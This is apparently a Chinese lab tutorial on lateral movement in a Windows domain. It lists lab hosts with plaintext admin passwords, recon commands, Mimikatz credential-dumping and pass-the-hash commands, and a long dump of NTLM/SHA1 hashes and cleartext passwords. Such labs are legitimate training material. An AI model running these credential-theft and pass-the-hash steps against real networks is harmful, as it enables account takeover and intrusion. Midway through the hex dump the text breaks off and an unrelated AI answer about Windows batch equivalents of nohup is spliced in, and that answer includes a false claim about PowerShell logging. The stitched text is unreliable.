第66天-内网安全-域横向批量-at&schtasks&impacket

文章展示了内网渗透案例,包括利用Mimikatz提取凭证、at&schtasks执行远程命令及明文、HASH传递,实现多主机权限提升,涉及信息收集、认证协议破解及自动化脚本编写。

思维导图

66-1

环境配置

2008 r2 webserver

域内 web 服务器
本地管理员账号密码 :
.\administraotr:admin!@#45
当前机器域用户密码 :

god\webadmin:admin!@#45


2003 x86 fileserver

域内文件服务器
本地管理员账号密码 :
administrator : admin
当前机器域用户密码 :

god\fileadmin : Admin12345


2008 r2 x64 dc god.org

主域控机器
域管账号密码:

God\administrator : Admin12345


2012 sqlserver

域内数据库服务器
本地管理员账号密码 :
.\administrator:admin!@#45
当前机器域用户密码 :

god\dbadmin:admin!@#45


w7 x64 mary-pc

域内个人机
本地管理员账号密码 :
.\mary : admin
当前机器域用户密码 :

god\mary : admin!@#45


w8.1 x64 jack-pc

域内个人机
本地管理员账号密码 :
.\jack : admin
当前机器域用户密码 :
god\boss : Admin12345

演示案例:

横向渗透明文 HASH 传递批量利用-升级版

拿下2008 r2 webserver权限后进行信息收集

信息收集
net user
net start
tasklist
schtasks
at
ipconfig /all     判断存在域-dns
net time /domain  判断主域
netstat -ano      当前网络端口开放
nslookup   		  域名 追踪来源地址

net user

net start

66-3

tasklist

66-4

schtasks

66-5

ipconfig / all

66-6

net view /domain

66-7

net time /domain

66-8

nslookup 计算机名称

66-9

netstat -ano

66-10

mimikazt搜集收集用户凭证

log
privilege ::debug
sekurlsa::logonpasswords
sekurlsa::tickets /export
sekurlsa::pth /user:Administrateur /domain:god.org/ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd

  • log
  • privilege ::debug
mimikatz # Using 'mimikatz.log' for logfile : OK
mimikatz # privilege::debug
Privilege '20' OK
  • sekurlsa::logonpasswords
mimikatz # sekurlsa::logonpasswords

Authentication Id : 0 ; 521318 (00000000:0007f466)
Session           : Interactive from 1
User Name         : webadmin
Domain            : GOD
Logon Server      : OWA2010CN-GOD
Logon Time        : 2022/5/8 20:39:30
SID               : S-1-5-21-1218902331-2157346161-1782232778-1132
	msv :	
	 [00000003] Primary
	 * Username : webadmin
	 * Domain   : GOD
	 * LM       : e90127c07127ed12f4ebf668acca53e9
	 * NTLM     : 518b98ad4178a53695dc997aa02d455c
	 * SHA1     : 39aa99a9e2a53ffcbe1b9eb411e8176681d01c39
	tspkg :	
	 * Username : webadmin
	 * Domain   : GOD
	 * Password : admin!@#45
	wdigest :	
	 * Username : webadmin
	 * Domain   : GOD
	 * Password : admin!@#45
	kerberos :	
	 * Username : webadmin
	 * Domain   : GOD.ORG
	 * Password : admin!@#45
	ssp :	
	credman :	

Authentication Id : 0 ; 143584 (00000000:000230e0)
Session           : Service from 0
User Name         : MSSQLFDLauncher
Domain            : NT Service
Logon Server      : (null)
Logon Time        : 2022/5/8 20:25:53
SID               : S-1-5-80-3263513310-3392720605-1798839546-683002060-3227631582
	msv :	
	 [00000003] Primary
	 * Username : WEBSERVER$
	 * Domain   : GOD
	 * NTLM     : 450098ea358ba14a9e17e3690b94c0e4
	 * SHA1     : 946f96a330bd558a1af3ee06fb4edf90ed58c909
	tspkg :	
	 * Username : WEBSERVER$
	 * Domain   : GOD
	 * Password : fd ac 43 12 ff 53 16 69 f8 69 33 47 0f 3b 98 21 2c 7d be 01 f4 19 94 1b 9a 04 e5 f9 3e 01 fe 3d 97 ea f0 09 ab 3e 20 2e da a1 f6 9a 99 87 18 77 a1 fd 5d c9 8a cb c2 f7 75 16 81 34 0e e2 7b a4 76 43 0c 97 77 bc 84 b0 ef f2 21 14 eb 9f 5e 17 03 26 e1 b2 a0 57 a0 33 e7 dc b4 63 16 42 14 fd dc be a5 a6 98 5e d0 16 3a 43 9c 41 e8 08 97 16 1d 4e 95 43 b3 79 6d 60 f4 63 f2 6f af 55 d8 fa fa 69 15 75 57 98 55 62 00 a6 d8 d9 d9 5a 6a 78 89 0b 38 2b e1 85 de bc ba 65 34 10 b9 bc b5 14 0e fb a3 36 2a b7 bf 19 fd e2 49 df b7 6c a5 4b 70 b3 17 20 dc 6e 03 48 29 67 12 e2 8d b4 4a 14 24 a1 10 10 eb 94 36 c2 ef 4e 30 a3 36 b7 c6 c3 b2 75 96 a4 31 8b 5a 34 1d 77 ce cb 23 5d 3d e6 c6 65 c4 a6 f2 9d ab d8 eb c6 3d dd fe 5c d0 09 
	wdigest :	
	 * Username : WEBSERVER$
	 * Domain   : GOD
	 * Password : fd ac 43 12 ff 53 16 69 f8 69 33 47 0f 3b 98 21 2c 7d be 01 f4 19 94 1b 9a 04 e5 f9 3e 01 fe 3d 97 ea f0 09 ab 3e 20 2e da a1 f6 9a 99 87 18 77 a1 fd 5d c9 8a cb c2 f7 75 16 81 34 0e e2 7b a4 76 43 0c 97 77 bc 84 b0 ef f2 21 14 eb 9f 5e 17 03 26 e1 b2 a0 57 a0 33 e7 dc b4 63 16 42 14 fd dc be a5 a6 98 5e d0 16 3a 43 9c 41 e8 08 97 16 1d 4e 95 43 b3 79 6d 60 f4 63 f2 6f af 55 d8 fa fa 69 15 75 57 98 55 62 00 a6 d8 d9 d9 5a 6a 78 89 0b 38 2b e1 85 de bc ba 65 34 10 b9 bc b5 14 0e fb a3 36 2a b7 bf 19 fd e2 49 df b7 6c a5 4b 70 b3 17 20 dc 6e 03 48 29 67 12 e2 8d b4 4a 14 24 a1 10 10 eb 94 36 c2 ef 4e 30 a3 36 b7 c6 c3 b2 75 96 a4 31 8b 5a 34 1d 77 ce cb 23 5d 3d e6 c6 65 c4 a6 f2 9d ab d8 eb c6 3d dd fe 5c d0 09 
	kerberos :	
	 * Username : WEBSERVER$
	 * Domain   : god.org
	 * Password : fd ac 43 12 ff 53 16 69 f8 69 33 47 0f 3b 98 21 2c 7d be 01 f4 19 94 1b 9a 04 e5 f9 3e 01 fe 3d 97 ea f0 09 ab 3e 20 2e da a1 f6 9a 99 87 18 77 a1 fd 5d c9 8a cb c2 f7 75 16 81 34 0e e2 7b a4 76 43 0c 97 77 bc 84 b0 ef f2 21 14 eb 9f 5e 17 03 26 e1 b2 a0 57 a0 33 e7 dc b4 63 16 42 14 fd dc be a5 a6 98 5e d0 16 3a 43 9c 41 e8 08 97 16 1d 4e 95 43 b3 79 6d 60 f4 63 f2 6f af 55 d8 fa fa 69 15 75 57 98 55 62 00 a6 d8 d9 d9 5a 6a 78 89 0b 38 2b e1 85 de bc ba 65 34 10 b9 bc b5 14 0e fb a3 36 2a b7 bf 19 fd e2 49 df b7 6c a5 4b 70 b3 17 20 dc 6e 03 48 29 67 12 e2 8d b4 4a 14 24 a1 10 10 eb 94 36 c2 ef 4e 30 a3 36 b7 c6 c3 b2 75 96 a4 31 8b 5a 34 1d 77 ce cb 23 5d 3d e6 c6 65 c4 a6 f2 9d ab d8 eb c6 3d dd fe 5c d0 09 
	ssp :	
	credman :	

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : WEBSERVER$
Domain            : GOD
Logon Server      : (null)
Logon Time        : 2022/5/8 20:25:21
SID               : S-1-5-20
	msv :	
	 [00000003] Primary
	 * Username : WEBSERVER$
	 * Domain   : GOD
	 * NTLM     : 450098ea358ba14a9e17e3690b94c0e4
	 * SHA1     : 946f96a330bd558a1af3ee06fb4edf90ed58c909
	tspkg :	
	wdigest :	
	 * Username : WEBSERVER$
	 * Domain   : GOD
	 * Password : fd ac 43 12 ff 53 16 69 f8 69 33 47 0f 3b 98 21 2c 7d be 01 f4 19 94 1b 9a 04 e5 f9 3e 01 fe 3d 97 ea f0 09 ab 3e 20 2e da a1 f6 9a 99 87 18 77 a1 fd 5d c9 8a cb c2 f7 75 16 81 34 0e e2 7b a4 76 43 0c 97 77 bc 84 b0 ef f2 21 14 eb 9f 5e 17 03 26 e1 b2 a0 57 a0 33 e7 dc b4 63 16 42 14 fd dc be a5 a6 98 5e d0 16 3a 43 9c 41 e8 08 97 16 1d 4e 95 43 b3 79 6d 60 f4 63 f2 6f af 55 d8 fa fa 69 15 75 57 98 55 62 00 a6 d8 d9 d9 5a 6a 78 89 0b 38 2b e1 85 de bc ba 65 34 10 b9 bc b5 14 0e fb a3 36 2a b7 bf 19 fd e2 49 df b7 6c a5 4b 70 b3 17 20 dc 6e 03 48 29 67 12 e2 8d b4 4a 14 24 a1 10 10 eb 94 36 c2 ef 4e 30 a3 36 b7 c6 c3 b2 75 96 a4 31 8b 5a 34 1d 77 ce cb 23 5d 3d e6 c6 65 c4 a6 f2 9d ab d8 eb c6 3d dd fe 5c d0 09 
	kerberos :	
	 * Username : webserver$
	 * Domain   : GOD.ORG
	 * Password : fd ac 43 12 ff 53 16 69 f8 69 33 47 0f 3b 98 21 2c 7d be 01 f4 19 94 1b 9a 04 e5 f9 3e 01 fe 3d 97 ea f0 09 ab 3e 20 2e da a1 f6 9a 99 87 18 77 a1 fd 5d c9 8a cb c2 f7 75 16 81 34 0e e2 7b a4 76 43 0c 97 77 bc 84 b0 ef f2 21 14 eb 9f 5e 17 03 26 e1 b2 a0 57 a0 33 e7 dc b4 63 16 42 14 fd dc be a5 a6 98 5e d0 16 3a 43 9c 41 e8 08 97 16 1d 4e 95 43 b3 79 6d 60 f4 63 f2 6f af 55 d8 fa fa 69 15 75 57 98 55 62 00 a6 d8 d9 d9 5a 6a 78 89 0b 38 2b e1 85 de bc ba 65 34 10 b9 bc b5 14 0e fb a3 36 2a b7 bf 19 fd e2 49 df b7 6c a5 4b 70 b3 17 20 dc 6e 03 48 29 67 12 e2 8d b4 4a 14 24 a1 10 10 eb 94 36 c2 ef 4e 30 a3 36 b7 c6 c3 b2 75 96 a4 31 8b 5a 34 1d 77 ce cb 23 5d 3d e6 c6 65 c4 a6 f2 9d ab d8 eb c6 3d dd fe 5c d0 09 
	ssp :	
	credman :	

Authentication Id : 0 ; 47208 (00000000:0000b868)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2022/5/8 20:25:21
SID               : 
	msv :	
	 [00000003] Primary
	 * Username : WEBSERVER$
	 * Domain   : GOD
	 * NTLM     : 450098ea358ba14a9e17e3690b94c0e4
	 * SHA1     : 946f96a330bd558a1af3ee06fb4edf90ed58c909
	tspkg :	
	wdigest :	
	kerberos :	
	ssp :	
	credman :	

Authentication Id : 0 ; 794675 (00000000:000c2033)
Session           : Interactive from 2
User Name         : Administrator
Domain            : WEBSERVER
Logon Server      : WEBSERVER
Logon Time        : 2022/5/8 20:47:14
SID               : S-1-5-21-95064677-3481858386-3840636109-500
	msv :	
	 [00000003] Primary
	 * Username : Administrator
	 * Domain   : WEBSERVER
	 * LM       : e90127c07127ed12f4ebf668acca53e9
	 * NTLM     : 518b98ad4178a53695dc997aa02d455c
	 * SHA1     : 39aa99a9e2a53ffcbe1b9eb411e8176681d01c39
	tspkg :	
	 * Username : Administrator
	 * Domain   : WEBSERVER
	 * Password : admin!@#45
	wdigest :	
	 * Username : Administrator
	 * Domain   : WEBSERVER
	 * Password : admin!@#45
	kerberos :	
	 * Username : Administrator
	 * Domain   : WEBSERVER
	 * Password : admin!@#45
	ssp :	
	 [00000000]
	 * Username : administrator
	 * Domain   : god.org
	 * Password : Admin12345
	credman :	

Authentication Id : 0 ; 995 (00000000:000003e3)
Session           : Service from 0
User Name         : IUSR
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2022/5/8 20:25:25
SID               : S-1-5-17
	msv :	
	tspkg :	
	wdigest :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	kerberos :	
	ssp :	
	credman :	

Authentication Id : 0 ; 103189 (00000000:00019315)
Session           : Service from 0
User Name         : ReportServer
Domain            : NT Service
Logon Server      : (null)
Logon Time        : 2022/5/8 20:25:24
SID               : S-1-5-80-2885764129-887777008-271615777-1616004480-2722851051
	msv :	
	 [00000003] Primary
	 * Username : WEBSERVER$
	 * Domain   : GOD
	 * NTLM     : 450098ea358ba14a9e17e3690b94c0e4
	 * SHA1     : 946f96a330bd558a1af3ee06fb4edf90ed58c909
	tspkg :	
	 * Username : WEBSERVER$
	 * Domain   : GOD
	 * Password : fd ac 43 12 ff 53 16 69 f8 69 33 47 0f 3b 98 21 2c 7d be 01 f4 19 94 1b 9a 04 e5 f9 3e 01 fe 3d 97 ea f0 09 ab 3e 20 2e da a1 f6 9a 99 87 18 77 a1 fd 5d c9 8a cb c2 f7 75 16 81 34 0e e2 7b a4 76 43 0c 97 77 bc 84 b0 ef f2 21 14 eb 9f 5e 17 03 26 e1 b2 a0 57 a0 33 e7 dc b4 63 16 42 14 fd dc be a5 a6 98 5e d0 16 3a 43 9c 41 e8 08 97 16 1d 4e 95 43 b3 79 6d 60 f4 63 f2 6f af 55 d8 fa fa 69 15 75 57 98 55 62 00 a6 d8 d9 d9 5a 6a 78 89 0b 38 2b e1 85 de bc ba 65 34 10 b9 bc b5 14 0e fb a3 36 2a b7 bf 19 fd e2 49 df b7 6c a5 4b 70 b3 17 20 dc 6e 03 48 29 67 12 e2 8d b4 4a 14 24 a1 10 10 eb 94 36 c2 ef 4e 30 a3 36 b7 c6 c3 b2 75 96 a4 31 8b 5a 34 1d 77 ce cb 23 5d 3d e6 c6 65 c4 a6 f2 9d ab d8 eb c6 3d dd fe 5c d0 09 
	wdigest :	
	 * Username : WEBSERVER$
	 * Domain   : GOD
	 * Password : fd ac 43 12 ff 53 16 69 f8 69 33 47 0f 3b 98 21 2c 7d be 01 f4 19 94 1b 9a 04 e5 f9 3e 01 fe 3d 97 ea f0 09 ab 3e 20 2e da a1 f6 9a 99 87 18 77 a1 fd 5d c9 8a cb c2 f7 75 16 81 34 0e e2 7b a4 76 43 0c 97 77 bc 84 b0 ef f2 21 14 eb 9f 5e 17 03 26 e1 b2 a0 57 a0 33 e7 dc b4 63 16 42 14 fd dc be a5 a6 98 5e d0 16 3a 43 9c 41 e8 08 97 16 1d 4e 95 43 b3 79 6d 60 f4 63 f2 6f af 55 d8 fa fa 69 15 75 57 98 55 62 00 a6 d8 d9 d9 5a 6a 78 89 0b 38 2b e1 85 de bc ba 65 34 10 b9 bc b5 14 0e fb a3 36 2a b7 bf 19 fd e2 49 df b7 6c a5 4b 70 b3 17 20 dc 6e 03 48 29 67 12 e2 8d b4 4a 14 24 a1 10 10 eb 94 36 c2 ef 4e 30 a3 36 b7 c6 c3 b2 75 96 a4 31 8b 5a 34 1d 77 ce cb 23 5d 3d e6 c6 65 c4 a6 f2 9d ab d8 eb c6 3d dd fe 5c d0 09 
	kerberos :	
	 * Username : WEBSERVER$
	 * Domain   : GOD.ORG
	 * Password : fd ac 43 12 ff 53 16 69 f8 69 33 47 0f 3b 98 21 2c 7d be 01 f4 19 94 1b 9a 04 e5 f9 3e 01 fe 3d 97 ea f0 09 ab 3e 20 2e da a1 f6 9a 99 87 18 77 a1 fd 5d c9 8a cb c2 f7 75 16 81 34 0e e2 7b a4 76 43 0c 97 77 bc 84 b0 ef f2 21 14 eb 9f 5e 17 03 26
<think>好的,我现在需要回答用户的问题:“在.bat文件中类似于`nohup mutter -r&`的命令是什么”。首先,我需要理解用户的需求。用户可能是在Linux环境下使用`nohup`命令来运行一个程序(比如mutter),并且希望这个程序在后台运行,同时忽略挂断信号,即使终端关闭也能继续执行。现在用户想在Windows的批处理文件(.bat)中找到类似的实现方法。 首先,我得回忆一下Linux中的`nohup`和`&`的作用。`nohup`用于让命令在用户退出登录后继续运行,并且将输出重定向到nohup.out文件。而`&`是将命令放到后台执行。因此,用户可能希望两个功能:后台运行和持久运行(即使关闭终端)。 接下来,我需要考虑Windows批处理中的对应方法。对于后台运行,Linux中的`&`在Windows中可能对应`start`命令,因为`start`可以启动一个新窗口或进程而不阻塞当前脚本。而`nohup`的功能,在Windows中没有直接对应的命令,但可能需要确保进程在关闭命令提示符后仍然运行,或者将输出重定向到文件。 用户提到的`nohup mutter -r &`中的`&`是将进程放入后台,而`nohup`则处理挂断信号和输出重定向。在Windows中,`start`命令可以启动一个独立的进程,并且使用`B`选项可以在后台运行,不创建新窗口。例如,`start /B mutter -r`。但这可能不会处理输出重定向,所以用户可能需要手动将输出重定向到文件,比如`mutter -r > output.log 2>&1`。 此外,用户可能希望即使关闭命令提示符窗口,进程也能继续运行。在Windows中,默认情况下,如果启动一个进程的命令行窗口被关闭,该进程也会被终止。为了实现类似于`nohup`的效果,可能需要使用其他方法,比如使用`wmic`或`schtasks`来创建计划任务,或者在后台启动进程时使用特定的工具,如`start`命令结合`/B`选项,但这可能仍然无法完全达到`nohup`的效果。 可能还需要考虑使用第三方工具,比如使用Windows的PowerShell命令,例如`Start-Process -NoNewWindow -FilePath mutter -ArgumentList "-r"`,但用户询问的是.bat文件中的命令,所以可能需要坚持使用原生命令。 总结一下,可能的解决方案是使用`start /B`来后台运行,并重定向输出到文件,例如`start /B mutter -r > output.log 2>&1`。但需要注意,当父命令提示符窗口关闭时,子进程可能仍然会被终止,因此可能需要其他方法,如使用`wmic`进程调用,或者在启动进程后立即退出父进程,但这需要进一步验证。 现在需要验证这些方法是否可行,并确保给出的答案准确无误。同时,需要检查是否有更合适的原生批处理命令组合能够实现类似`nohup`和`&`的效果。</think>在 Windows 的 `.bat` 脚本中,若需实现类似 Linux 下 `nohup mutter -r &` 的效果(即 **后台运行程序,且父进程退出后子进程仍存活**),需结合以下功能: 1. **后台运行**:通过 `start /B` 实现不创建新窗口的后台执行。 2. **持久化运行**:通过 `wmic` 或 `PowerShell` 调用,使进程独立于命令行窗口。 3. **输出重定向**:将日志保存到文件,避免丢失输出信息。 --- ### **基础实现方法** #### 1. **仅后台运行(类似 `&`)** 使用 `start /B` 直接启动程序,但关闭命令行窗口后子进程会被终止: ```batch @echo off start /B mutter -r ``` #### 2. **后台运行 + 输出重定向(类似 `nohup`)** 将标准输出和错误输出重定向到文件: ```batch @echo off start /B mutter -r > output.log 2>&1 ``` --- ### **进阶实现:独立于父进程的持久化运行** 若需进程在关闭 `.bat` 脚本所在命令行窗口后仍存活,需借助系统工具创建独立进程: #### **方法 1:通过 `wmic` 启动进程** ```batch @echo off wmic process call create "mutter -r" ``` - **效果**:进程由系统直接管理,与当前命令行窗口无关。 - **限制**:无法直接传递复杂参数(需处理引号和空格)。 #### **方法 2:通过 `PowerShell` 启动进程** ```batch @echo off powershell -Command "Start-Process mutter -ArgumentList '-r' -WindowStyle Hidden" ``` - **参数说明**: - `-WindowStyle Hidden`:隐藏窗口(类似后台运行)。 - 输出默认重定向到 `$env:USERPROFILE\AppData\Local\Temp` 下的随机日志文件。 --- ### **完整示例:持久化运行 + 日志记录** 结合 `wmic` 和输出重定向: ```batch @echo off wmic process call create "cmd /c mutter -r > \"%CD%\output.log\" 2>&1" ``` - **解析**: - `cmd /c`:通过新命令行会话执行命令。 - `> \"%CD%\output.log\" 2>&1`:将输出和错误写入当前目录的 `output.log`。 --- ### **注意事项** 1. **路径含空格的处理**: ```batch wmic process call create "\"C:\Program Files\mutter.exe\" -r" ``` - 路径和参数需用 `\"` 转义双引号。 2. **依赖环境变量**: - 若 `mutter` 不在系统 `PATH` 中,需指定完整路径: ```batch wmic process call create "\"D:\Tools\mutter.exe\" -r" ``` 3. **进程所有权**: - 通过 `wmic` 或 `PowerShell` 启动的进程归属于系统,无法通过任务管理器直接关联到用户会话。 --- ### **方案对比** | 方法 | 后台运行 | 持久化存活 | 日志记录 | 复杂度 | |--------------------|----------|------------|----------------|--------| | `start /B` | ✔️ | ❌ | 需手动重定向 | 低 | | `wmic` | ✔️ | ✔️ | 需手动重定向 | 中 | | `PowerShell` | ✔️ | ✔️ | 自动记录到临时文件 | 中 | --- ### **常见问题** #### **Q1:为何 `start /B` 启动的进程在关闭窗口后会被终止?** - **原因**:`start /B` 的子进程仍隶属于当前命令行窗口的会话。关闭窗口会终止会话及其所有子进程。 #### **Q2:如何验证进程是否独立运行?** - 执行脚本后,打开任务管理器查找 `mutter.exe`。若关闭命令行窗口后进程仍存在,则说明持久化生效。 #### **Q3:如何终止持久化进程?** - 通过任务管理器手动结束,或使用 `taskkill` 命令: ```batch taskkill /IM mutter.exe /F ``` --- 通过上述方法,可在 `.bat` 脚本中实现与 Linux `nohup ... &` 类似的持久化后台运行效果。根据需求选择基础或进阶方案即可。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值